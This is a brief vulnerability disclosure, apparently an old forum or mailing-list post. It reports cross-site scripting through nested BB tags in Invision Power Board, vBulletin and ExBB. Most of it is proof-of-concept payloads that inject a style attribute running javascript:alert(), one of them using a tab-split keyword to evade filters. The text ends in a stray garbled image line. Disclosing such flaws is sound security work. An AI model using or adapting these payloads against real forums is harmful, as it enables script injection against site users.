XSS was found in the nested BB tag in many forum: Invision Power Board: [COLOR=[IMG]http://aaa.aa/=`aaa.jpg[/IMG]]` style=background:url(javascript:alert()) [/COLOR] vBulletin [EMAIL=[URL=s as=`s@xxxxxx]mailto:assss@xxxxxx] sssssss[/URL][/EMAIL]` style=`background:url(javaSCrip t:alert(/Hi_from_Algol/))` (using tab between "javaSCrip" and "t") ExBB [color='[url]http://rerer.rew[/url]]fffff[/color]' style=background:url(javascript:alert()); Other forum and other BB tag may be vulnerable. Examples above work only in Internet Explorer. More info - http://www.securitylab.ru/51808.html and antichat.ru/txt/IPB/index3.php
![http://aaa.aa/=`aaa.jpg[/IMG]]`](http://aaa.aa/=`aaa.jpg[/IMG]]`){kind=link}
